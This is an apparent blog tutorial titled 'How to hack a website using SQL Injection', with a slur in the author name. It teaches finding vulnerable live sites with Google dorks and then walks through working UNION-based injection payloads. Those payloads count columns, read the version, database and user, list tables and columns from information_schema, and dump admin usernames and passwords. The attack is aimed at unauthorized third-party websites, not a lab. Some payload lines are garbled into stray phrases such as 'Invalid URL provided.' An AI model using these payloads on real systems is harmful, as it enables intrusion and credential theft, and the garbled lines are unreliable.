How to hack a website using SQL Injection in easy steps.

Created by

hamzaisgay.
After a long time it's my first tutorial on website hacking using
SQL Injection attack with easy and simple steps. I have seen many people who cannot understand the SQL Injection method.
because it's really very hard to understand and inject malicious code into the URL and get the website database, so here I
Created SQL Injection tutorial with easy steps and understandable, hope you all will like it.

What is SQL Injection?

SQL Injection is one of the most popular web application hacking methods. In SQL Injection, an attacker finds a website.
vulnerability (Vulnerability means Weakness point of website) and Inject Malicious code into URL and get Database of
Website and Hack the website this is called SQL Injection attack Exploiting DB (Database) and also SQL Injection
Vulnerability Exploitation.
Using SQL Injection attack method, an attacker can get complete database of the website, and user ID and password can be obtained.
If it is compromised, an attacker can also shut down my SQL server and the server will stop working. An attacker can modify
content of website and bypass login.

✔Requirements :-
SQL Injection Dorks. (Click to download) Skip ads after 5 Sec
Vulnerable Website. (Use Google to find SQL Injection Vulnerable Website)
Firefox with Hack bar add-on. (Click to download Hackbar add-on)
A little bit of understanding of SQL Injection and URL
Fresh Mind to Understand it.

✔Step 1. Find Vulnerable website.

An attacker always uses Google, Bing, or Yahoo search engines to search for SQL Injection vulnerable websites using
Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website)
URL)

Click here to download Huge list of SQL Injection Dorks

Search it on Google for example, these are a few SQL Injection vulnerable dorks.
___________
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
________________
Basically, I always use Google to search for vulnerable websites.

Here, for the tutorial, I already have one vulnerable website (but I can't reveal its name). In this result, you will find
thousands of websites, the common thing in this search result is all website URLs having this type of code at its end
inurl:index.php?id=

Yeah, definitely it will have because all these websites have DB and SQL Injection strings related to SQL Injection.
Dorks.

For example.www.targetwebsite.com/index.php?id=8
✔How to Check for Vulnerability.
Open any website URL related to SQL Injection Dorks.
Put Single Quote at the End of the website URL ( ' )
Note: To check the vulnerability, put a single quote (') at the end of the website URL and hit Enter.
For example.www.targetwebsite.com/index.php?id=2'
If the page remains the same or is not found, then it's not vulnerable, and if the page shows an error like this :-

An error occurred...

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right
syntax to use near '/contentPage.php?id=8' at line 1

An error occurred...

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right
syntax to use near ''' at line 1

This means the website is vulnerable to SQL Injection.

✔Step 2. Find the number of Columns.

Wooo hoo hoo !! We found SQL Injection Vulnerable website now it's time to find the number of columns present in the
Database.

To do that, replace that one single quote ( ' ) with 'Order By no.' statement until you find the error message.
Change the number from 1,2,3,4,5,6,7,8,9,... until you receive an error message like 'Unknown Column'.

For example: Change its order to 1, 2, 3, 4 like below:

www.targetwebsite.com/index.php?id=8Order by 1
www.targetwebsite.com/index.php?id=8Order by 2
www.targetwebsite.com/index.php?id=8Order by 3
www.targetwebsite.com/index.php?id=8Order by 4
www.targetwebsite.com/index.php?id=8Order by 5

And suppose the above method won't work, then use the method below:

www.targetwebsite.com/index.php?id=8order by 1--
www.targetwebsite.com/index.php?id=8order by 2--
www.targetwebsite.com/index.php?id=8order by 3--

If you get an Error on Order by 9 that means the DB has 8 columns and if you found an error on Order
By 6, the database has 5 columns. I mean, if you put 'Order by 12' and suppose the database has only 11.
Columns then Website will show Error like this :-

An error occurred...
Unknown column '12' in 'order clause'
This trick is actually used to find the number of Columns in DB. Understand the Below example and you will get to
know.
www.targetwebsite.com/index.php?id=8Order by 1 (No Error)
www.targetwebsite.com/index.php?id=8Order by 2 (No Error)
www.targetwebsite.com/index.php?id=8Order by 3 (No Error)
www.targetwebsite.com/index.php?id=8Order by 4 (No Error)
www.targetwebsite.com/index.php?id=8Order by 5 (No Error)
www.targetwebsite.com/index.php?id=8Order by 6 (No Error)
www.targetwebsite.com/index.php?id=8Order by 7 (No Error)
www.targetwebsite.com/index.php?id=8Order by 8 (No Error)
www.targetwebsite.com/index.php?id=8Order by 9 (No Error)
www.targetwebsite.com/index.php?id=8Order by 10 (No Error)
www.targetwebsite.com/index.php?id=8Order by 11 (No Error)
www.targetwebsite.com/index.php?id=8Order by 12 (Error)

Here, my Vulnerable website showed an error on Order by 12, which means my Vulnerable website has 11.
columns in its DB.

So now here I found number of columns in my DB :-

Number of Columns = 11

✔Step 3. Find the Vulnerable Column.

Basically, if the website is vulnerable, then it has a vulnerability in its column, and now it's time to find out that column.

Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using
the Query 'Union Select columns_sequence'.

And also change the ID Value to Negative, I mean Suppose the website has this URL index.php?id=8 Change it to
index.php?id=-8. Just put minus sign "-" before ID.

For example, if the number of columns is 11, then the query is as follows:
www.targetwebsite.com/index.php?id=-8union select 1,2,3,4,5,6,7,8,9,10,11--And Suppose above Method won't
work then use below method:-www.targetwebsite.com/index.php?id=-8 and 1=2 union select
1,2,3,4,5,6,7,8,9,10,11

✔ And once the query has been executed, it will display the number of columns. Yeahh.... !!

In the above result, I found three vulnerable columns: 2, 3, and 4.

let take 2 as our tutorial.

Well...! We found Vulnerable Columns, Now Next Step.
✔Step 4. Finding version, Database and User.
Now it's time to find out the website's database version and user.
Just replace Vulnerable Column no. with "version()"

For example.
www.targetwebsite.com/index.php?id=-8union select 1,version(),3,4,5,6,7,8,9,10,11--

And now Hit Enter: and you will get result.

Now again do the same replace Vulnerable column with different query like :- database(), user()For Eg.
www.targetwebsite.com/index.php?id=-8Translation not applicable for this input.
www.targetwebsite.com/index.php?id=-8union select 1,database(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8union select 1,user(),3,4,5,6,7,8,9,10,11--

And suppose the above method won't work, then use the method below:

www.targetwebsite.com/index.php?id=-8and 1=2 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--

✔Step 5. Finding the Table name.

Here we found vulnerable Column, DB Version name and User it's time to get Table name.
If the database version is 4 or above then you have to guess the table names (Blind SQL Injection attack)

Let us find now Table name of the Database, Same here Replace Vulnerable Column number with
group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For example.

www.targetwebsite.com/index.php?id=-8union select 1, group_concat(table_name), 3, 4, 5, 6, 7, 8, 9, 10, 11 from

information_schema.tables where table_schema=database()--

Now hit Enter and you can see Complete Table of Database.

(Click on Image to Enlarge it)

Great we found Table name now find the table name that is related to admin or user. as you can see in the above
Imagine there is one table named: userDatabase. Let us choose that table userDatabase and go to the next step.
✔Step 6. Finding the Column name.
Now same to find Column names, replace "group_concat(table_name)" with "group_concat(column_name)"
and Replace the "from information_schema.tables where table_schema=database()--" with "FROM
information_schema.columns WHERE table_name=mysqlchar--

Note: Do not hit Enter now.... First of all Convert

table name into Mysql Char String()

Install the Hackbar add-on in Firefox Click here to Download

After installing, you can see the toolbar, and if you can't, then hit F9. Select sql -> Mysql -> MysqlChar() in the Hackbar.

Enter the Table name you want to convert it into MySQL Char

Now you can see the Char like this :-

Copy and paste the code at the end of the url instead of the 'mysqlchar'
For example.

www.targetwebsite.com/index.php?id=-8union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM

information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--

And now hit enter and you will be able to see the column names like this :-
(Click on Image to Enlarge it)

Great Here we found Username and Password Column.

✔Step 7. Explore Database & Hack it.

Cool......! Now you know the next step what to do..... Get the ID and Password of Admin user using this command.
into URL. Now replace group_concat(column_name) with group_concat(username,0x2a,password). or any other
Column name you want to get Data.

For example.

Invalid URL provided.and 1=2 union select

1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,11 from userDatabase--
If the above Command doesn't work then use the Column name from the first and put all Columns at one time and you will
able to get complete database.

Now find the Admin page using this method: How to hack a website using Havij.